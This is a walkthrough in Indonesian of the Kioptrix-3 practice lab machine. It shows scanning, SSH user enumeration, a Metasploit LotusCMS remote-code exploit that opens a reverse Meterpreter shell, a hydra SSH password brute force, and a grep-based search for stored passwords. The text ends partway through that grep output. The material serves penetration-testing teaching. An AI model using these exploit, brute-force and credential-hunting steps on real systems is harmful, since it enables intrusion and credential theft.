The Kioptrix-03: Credential Hunger

Lanjutan kisah serial kioptrix kali ini adalah tentang credential attack atau serangan terhadap identitas seseorang. Credential dibutuhkan dalam proses authentikasi ketika seseorang akan memasuki sebuah sistem. Ia juga dibutuhkan ketika seseorang yang berada di dalam sistem ingin mengakses informasi tertentu. Prinsip dalam keamanan informasi terkait pengelolaan credential adalah “Need To Know”. Maksudnya, informasi akan diberikan sesuai dengan tanggung jawab, wewenang dan deskripsi pekerjaan. Mari kita ikuti perjalanan mencari kerentanan pada mesin Kioptrix-03 ini. Semoga bermanfaat.

Tahap Pertama: Scanning dan Enumeration

Seperti pada kisah terdahulu, kita akan awali perjalanan kita bersama nmap. Sebuah perangkat yang terbukti telah berhasil membantu Neo menyelesaikan berbagai misi dalam trilogi film The Matrix. Berdasarkan informasi yang dihimpun oleh nmap, mesin ini memiliki fungsi sebagai web server (Apache 2.2.8 dan PHP ) dan menggunakan SSH (OpenSSH 4.7p1) untuk melakukan administrasi jarak jauh terhadap server.

root@kali2:~# nmap -p- -A 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 19:43 PDT
Nmap scan report for 192.168.216.150 (192.168.216.150)
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.80 ms 192.168.216.150 (192.168.216.150)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds
root@kali2:~# 

Dengan bantuan nikto, dirb dan burpsuite kita mendapatkan cukup banyak file dan folder pada mesin Kioptrix-03. Namun demikian hanya ada tiga temuan yang menarik untuk ditelusuri lebih lanjut yaitu folder gallery kemudian phpmyadmin dan login form pada aplikasi LotusCMS (index.php). Perhatikan beberapa gambar berikut ini, khusus untuk folder gallery agar dilakukan penambahan kioptrix3.com pada file /etc/hosts dengan merujuk pada alamat IP Address dari Kali Linux milik kita.

Gambar 1. Login Form pada phpmyadmin
Gambar 2. Login Form pada aplikasi LotusCMS
Gambar 3. Folder gallery pada Server Kioptrix3
root@kali2:~# dirb http://192.168.216.150

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Apr 20 19:49:35 2020
URL_BASE: http://192.168.216.150/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.216.150/ ----
==> DIRECTORY: http://192.168.216.150/cache/                                                                                                     
==> DIRECTORY: http://192.168.216.150/core/                                                                                                      
+ http://192.168.216.150/data (CODE:403|SIZE:326)                                                                                                
+ http://192.168.216.150/favicon.ico (CODE:200|SIZE:23126)                                                                                       
==> DIRECTORY: http://192.168.216.150/gallery/                                                                                                   
+ http://192.168.216.150/index.php (CODE:200|SIZE:1819)                                                                                          
==> DIRECTORY: http://192.168.216.150/modules/                                                                                                   
==> DIRECTORY: http://192.168.216.150/phpmyadmin/                                                                                                
+ http://192.168.216.150/server-status (CODE:403|SIZE:335)                                                                                       
==> DIRECTORY: http://192.168.216.150/style/                                                                                                     
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/cache/ ----
+ http://192.168.216.150/cache/index.html (CODE:200|SIZE:1819)                                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/ ----
==> DIRECTORY: http://192.168.216.150/core/controller/                                                                                           
+ http://192.168.216.150/core/index.php (CODE:200|SIZE:0)                                                                                        
==> DIRECTORY: http://192.168.216.150/core/lib/                                                                                                  
==> DIRECTORY: http://192.168.216.150/core/model/                                                                                                
==> DIRECTORY: http://192.168.216.150/core/view/                                                                                                 
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/gallery/ ----
+ http://192.168.216.150/gallery/index.php (CODE:500|SIZE:5650)                                                                                  
==> DIRECTORY: http://192.168.216.150/gallery/photos/                                                                                            
==> DIRECTORY: http://192.168.216.150/gallery/themes/                                                                                            
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/ ----
+ http://192.168.216.150/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                            
+ http://192.168.216.150/phpmyadmin/index.php (CODE:200|SIZE:8136)                                                                               
==> DIRECTORY: http://192.168.216.150/phpmyadmin/js/                                                                                             
==> DIRECTORY: http://192.168.216.150/phpmyadmin/lang/                                                                                           
+ http://192.168.216.150/phpmyadmin/libraries (CODE:403|SIZE:342)                                                                                
+ http://192.168.216.150/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)                                                                                
==> DIRECTORY: http://192.168.216.150/phpmyadmin/scripts/                                                                                        
==> DIRECTORY: http://192.168.216.150/phpmyadmin/themes/                                                                                         
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/style/ ----
+ http://192.168.216.150/style/admin.php (CODE:200|SIZE:356)                                                                                     
+ http://192.168.216.150/style/index.php (CODE:200|SIZE:0)                                                                                       
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/controller/ ----
+ http://192.168.216.150/core/controller/index.php (CODE:200|SIZE:0)                                                                             
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/lib/ ----
+ http://192.168.216.150/core/lib/index.php (CODE:200|SIZE:0)                                                                                    
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/model/ ----
+ http://192.168.216.150/core/model/index.php (CODE:200|SIZE:0)                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/view/ ----
+ http://192.168.216.150/core/view/index.php (CODE:200|SIZE:0)                                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Apr 20 19:50:05 2020
DOWNLOADED: 46120 - FOUND: 17
root@kali2:~# 
root@kali2:~# nikto -h http://192.168.216.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.216.150
+ Target Hostname:    192.168.216.150
+ Target Port:        80
+ Start Time:         2020-04-20 19:51:03 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 12:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-04-20 19:51:36 (GMT-7) (33 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali2:~# 

Selain itu, ada tambahan informasi menarik. Berdasarkan penelusuran pada folder gallery, setelah kita memasukkan comment pada blog ternyata ada informasi bahwa kemungkinan besar ada user account bernama loneferret (gambar 4). Namun hal tersebut harus diverifikasi keberadaannya.

Gambar 4. Kemungkinan besar ada user account bernama loneferret

Untuk memastikan keberadaan user account loneferret tersebut, maka kita akan menggunakan perangkat metasploit. Modul auxiliary yang akan digunakan bernama auxiliary/scanner/ssh/ssh_enumusers. Berikut ini adalah hasil eksekusi dari perangkat lunak tersebut.

msf5 auxiliary(scanner/ssh/ssh_enumusers) > show options 

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CHECK_FALSE  false            no        Check for false positives (random username)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        22               yes       The target port
   THREADS      1                yes       The number of concurrent threads
   THRESHOLD    10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME     loneferret       no        Single username to test (username spray)
   USER_FILE                     no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet


msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 auxiliary(scanner/ssh/ssh_enumusers) > 
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.216.150:22 - SSH - Using malformed packet technique
[*] 192.168.216.150:22 - SSH - Starting scan
[+] 192.168.216.150:22 - SSH - User 'loneferret' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > 

Berdasarkan verifikasi dari metasploit dapat disimpulkan bahwa user account bernama loneferret adalah nyata adanya dan penting untuk ditindaklanjuti pada aktivitas tahap selanjutnya.

Sedangkan terkait informasi untuk sistem operasi, besar kemungkinan server Kioptrix03 menggunakan Distro Ubuntu dengan kernel antara 2.6.9 – 2.6.33. Belum diketahui lebih lanjut informasi tentang versi Ubuntu yang digunakan dan jenis prosesor pada server tersebut, 32 atau 64 bit? Upaya identifikasi sistem operasi dilakukan dengan nmap menggunakan opsi -O serta –osscan-guess. Hasil eksekusi perangkat tersebut dapat dilihat sebagaimana berikut:

root@kali2:~# nmap -O --osscan-guess 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 23:07 PDT
Nmap scan report for kioptrix3.com (192.168.216.150)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

Tahap Kedua : Mapping Attack Surface

Berdasarkan pencarian, pengumpulan dan verifikasi informasi pada tahap sebelumnya, maka peta potensi kerentanan dan peluang serangan siber dapat dilakukan. Pada gambar 4 berikut ini tampak bahwa sistem operasi beserta kedua layanan yang ada (HTTP dan SSH) memiliki banyak peluang serangan siber yang penting untuk ditelusuri dan ditindalnjuti.

Gambar 5. Mapping Attack Surface pada Server Kioptrix3

Tahap Ketiga : Exploitation dan Post-Exploitation

Sasaran taktis untuk kegiatan Exploitation adalah untuk mendapatkan limited shell. Sedangkan sasaran taktis untuk kegiatan Post-Exploitation adalah untuk mendapatkan hak akses dari sistem administrator atau root. Namun demikian kegiatan peningkatan hak akses pada Post-Exploitation tidak dibutuhkan apabila kita telah mendapatkan hak akses sistem administrator pada kegiatan Exploitation. Kisah Kioptrix1 adalah contoh kegiatan exploitation tanpa perlu melakukan peningkatan hak akses lagi (privilege escalation) dengan memanfaatkan kerentanan Remote Code Execution (RCE).

Kita mulai dengan menelusuri kemungkinan adanya peluang serangan dengan Remote Code Execution atau RCE berdasarkan Mapping Attack Surface yang telah dilakukan pada tahap sebelumnya.

Berdasarkan penelusuran yang dilakukan ternyata potensi RCE pada sistem operasi tidak ditemukan. Meskipun besar kemungkinan ada kerentanan Buffer Over Flow pada kernel namun exploit yang ada untuk ditujukan untuk meningkatkan hak akses menjadi root (atau privilege escalation). Sedangkan potensi RCE pada OpenSSH 4.7p1 tidak ditemukan.

Selanjutnya potensi RCE pada layanan HTTP tidak ditemukan pada phpmyadmin maupun pada Apache. Potensi tersebut ternyata ada pada LotusCMS. Hal ini terverifikasi dengan menggunakan perangkat metasploit, yaitu menggunakan modul exploit bernama exploit/multi/http/lcms_php_exec. Berikut ini adalah hasil eksekusi pada metasploit dimana kita berhasil mendapatkan limited shell pada server Kioptrix3 dengan nama user www-data:

root@kali2:~# msfconsole 
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1066 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > search lotuscms

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   1  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution


msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options 

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin&page=loginSubmit
URI => /index.php?system=Admin&page=loginSubmit
msf5 exploit(multi/http/lcms_php_exec) > show payloads 

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   1   generic/custom                                       normal  No     Custom Payload
   2   generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   3   generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   4   multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   5   multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
   6   php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   7   php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   8   php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   9   php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   10  php/download_exec                                    normal  No     PHP Executable Download and Execute
   11  php/exec                                             normal  No     PHP Execute Command 
   12  php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   13  php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   14  php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   15  php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   16  php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   18  php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

msf5 exploit(multi/http/lcms_php_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.216.149
LHOST => 192.168.216.149
msf5 exploit(multi/http/lcms_php_exec) > show options 

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting                           Required  Description
   ----     ---------------                           --------  -----------
   Proxies                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.216.150                           yes       The target address range or CIDR identifier
   RPORT    80                                        yes       The target port (TCP)
   SSL      false                                     no        Negotiate SSL/TLS for outgoing connections
   URI      /index.php?system=Admin&page=loginSubmit  yes       URI
   VHOST                                              no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.216.149  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf5 exploit(multi/http/lcms_php_exec) > exploit 

[*] Started reverse TCP handler on 192.168.216.149:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.216.150
[*] Meterpreter session 1 opened (192.168.216.149:4444 -> 192.168.216.150:49752) at 2020-04-21 06:21:05 -0700

id

meterpreter > 
meterpreter > id
[-] Unknown command: id.
meterpreter > id
[-] Unknown command: id.
meterpreter > shell
Process 6335 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

hostname
Kioptrix3

pwd
/home/www/kioptrix3.com

Peluang serangan siber lainnya yang patut kita telusuri selain RCE, adalah serangan brute force pada account loneferret pada layanan SSH. Kita akan menggunakan perangkat hydra untuk melakukan online cracking. Sedangkan wordlist yang akan kita gunakan berasal dari kompilasi credential bernama Seclist pada link https://github.com/danielmiessler/SecLists. Opsi yang kita gunakan pada hydra adalah -l karena menggunakan satu user saja, kemudian opsi -P karena kita menggunakan wordlist untuk password serta opsi -t untuk mengoptimalkan concurrent task selama aktivitas cracking berlangsung. Berikut ini adalah hasil cracking setelah perangkat hydra dijalankan:

root@kali2:~# hydra -l loneferret -P ~/Tools/SecLists/Passwords/Common-Credentials/10k-most-common.txt ssh://192.168.216.150 -t 4
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 06:54:19
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking ssh://192.168.216.150:22/
[STATUS] 52.00 tries/min, 52 tries in 00:01h, 9948 to do in 03:12h, 4 active
[22][ssh] host: 192.168.216.150   login: loneferret   password: starwars
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 06:56:04
root@kali2:~# 
root@kali2:~# ssh loneferret@192.168.216.150
loneferret@192.168.216.150's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ 

Berdasarkan hasil cracking dengan hydra, kita berhasil mendapatkan password dari loneferret, yaitu starwars. Setelah dilakukan login pada layanan SSH, kita berhasil masuk ke dalam server Kioptrix3. Dengan demikian kita berhasil mendapatkan limited shell, sebagaimana halnya telah kita lakukan melalui RCE pada Lotuscms. Teknik yang kita gunakan untuk menyerang credential pada SSH ini disebut Password Spray Attack. Jenis serangan ini memfokuskan pada satu satu credential saja, ketimbang menggunakan wordlist dengan banyak user name yang belum tentu benar.

Dengan demikian ada dua cara dalam kegiatan exploitation untuk mendapatkan limited shell. Perbedaan diantara kedua cara tersebut adalah, apabila menggunakan serangan RCE pada Lotuscms maka kita akan mendapatkan credential bernama www-data. Sedangkan jika kita menggunakan serangan brute force pada layanan SSH maka kita mendapatkan credential loneferret. Kita bisa memilih diantara kedua cara tersebut, namun pada tulisan ini kita akan menggunakan cara kedua.

Setelah kita berhasil login dengan credential dari loneferret, maka kita akan melakukan kegiatan Post-Exploitation untuk meningkatkan hak akses menjadi root atau sistem administrator. Kita awali dengan mencari informasi sensitif berupa credential dengan menggunakan perintah find, yaitu: find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null. Maksud dari perintah ini adalah mencari pada file berekstensi *.php dengan kedalaman sub-folder lima tingkat, kemudian mencari kata password dengan menggunakan perintah grep. Berikut ini adalah hasil eksekusi dari perintah tersebut.

loneferret@Kioptrix3:~$ find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null
/usr/share/phpmyadmin/libraries/header.inc.php:101:    } elseif (isset($js_to_run) && $js_to_run == 'user_password.js') {
/usr/share/phpmyadmin/libraries/header.inc.php:111:    <script src="./js/user_password.js" type="text/javascript"></script>
/usr/share/phpmyadmin/libraries/common.inc.php:350:    'user_password.php',
/usr/share/phpmyadmin/libraries/common.inc.php:408:        'pma_servername', 'pma_username', 'pma_password',
/usr/share/phpmyadmin/libraries/common.inc.php:824:                $cfg['Server']['password'], true);
/usr/share/phpmyadmin/libraries/common.inc.php:832:            $cfg['Server']['password'], false);
/usr/share/phpmyadmin/libraries/config.default.php:58: * The 'cookie' auth_type uses blowfish algorithm to encrypt the password. If
/usr/share/phpmyadmin/libraries/config.default.php:162: * MySQL password (only needed with 'config' auth_type)
/usr/share/phpmyadmin/libraries/config.default.php:164: * @global string $cfg['Servers'][$i]['password']
/usr/share/phpmyadmin/libraries/config.default.php:166:$cfg['Servers'][$i]['password'] = '';
/usr/share/phpmyadmin/libraries/config.default.php:190: * Whether to try to connect without password
/usr/share/phpmyadmin/libraries/config.default.php:192: * @global boolean $cfg['Servers'][$i]['nopassword']
/usr/share/phpmyadmin/libraries/config.default.php:194:$cfg['Servers'][$i]['nopassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:624: * show change password link
/usr/share/phpmyadmin/libraries/config.default.php:2173: * @global string $cfg['SQLValidator']['password']
/usr/share/phpmyadmin/libraries/config.default.php:2175:$cfg['SQLValidator']['password'] = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:28: * Also set a username and password if you have a private one
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:70:            // The class defaults to anonymous with an empty password
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:73:                $srv->setCredentials($cfg['SQLValidator']['username'], $cfg['SQLValidator']['password']);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:46:        var $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:97:        function _openSession($obj, $username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:103:    $use_array = array("a_userName" => $username, "a_password" => $password, "a_callingProgram" => $calling_program, "a_callingProgramVersion" => $calling_program_version, "a_targetDbms" => $target_dbms, "a_targetDbmsVersion" => $target_dbms_version, "a_connectionTechnology" => $connection_technology, "a_connectionTechnologyVersion" => $connection_technology_version, "a_interactive" => $interactive);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:107:           /* $ret = $obj->openSession($username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:177:            $this->password                      = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:195:         * @param  string  the password
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:199:        function setCredentials($username, $password)
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:202:            $this->password = $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:342:            $this->session_data = $this->_openSession($this->service_link, $this->username, $this->password,
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:4: * Displays form for password change 
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:6: * @version $Id: display_change_password.lib.php 10796 2007-10-16 07:09:50Z cybot_tm $
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:23:    <fieldset id="fieldset_change_password">
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:38:                    <input type="password" name="pma_pw" id="pw_pma_pw" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:41:                    <input type="password" name="pma_pw2" id="pw_pma_pw2" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:73:    <fieldset id="fieldset_change_password_footer" class="tblFooters">
/usr/share/phpmyadmin/libraries/common.lib.php:479:    // if the config password is wrong, or the MySQL server does not
/usr/share/phpmyadmin/libraries/common.lib.php:481:    // username/password
/usr/share/phpmyadmin/user_password.php:5: * @version $Id: user_password.php 10501 2007-07-18 15:32:08Z lem9 $
/usr/share/phpmyadmin/user_password.php:29: * If the "change password" form has been submitted, checks for valid values
/usr/share/phpmyadmin/user_password.php:51:        $err_url          = 'user_password.php?' . $common_url_query;
/usr/share/phpmyadmin/user_password.php:55:        $sql_query        = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . preg_replace('@.@s', '*', $pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:56:        $local_query      = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . PMA_sqlAddslashes($pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:59:        // Changes password cookie if required
/usr/share/phpmyadmin/user_password.php:60:        // Duration = till the browser is closed for password (we don't want this to be saved)
/usr/share/phpmyadmin/user_password.php:87: * If the "change password" form hasn't been submitted or the values submitted
/usr/share/phpmyadmin/user_password.php:91:$js_to_run = 'user_password.js';
/usr/share/phpmyadmin/user_password.php:100:require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/server_privileges.php:656:       . $spaces . '<label for="select_pred_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:660:       . $spaces . '    <select name="pred_password" id="select_pred_password" title="' . $GLOBALS['strPassword'] . '"' . "\n"
/usr/share/phpmyadmin/server_privileges.php:671:       . $spaces . '<input type="password" id="text_pma_pw" name="pma_pw" title="' . $GLOBALS['strPassword'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:678:       . $spaces . '<input type="password" name="pma_pw2" id="text_pma_pw2" title="' . $GLOBALS['strReType'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
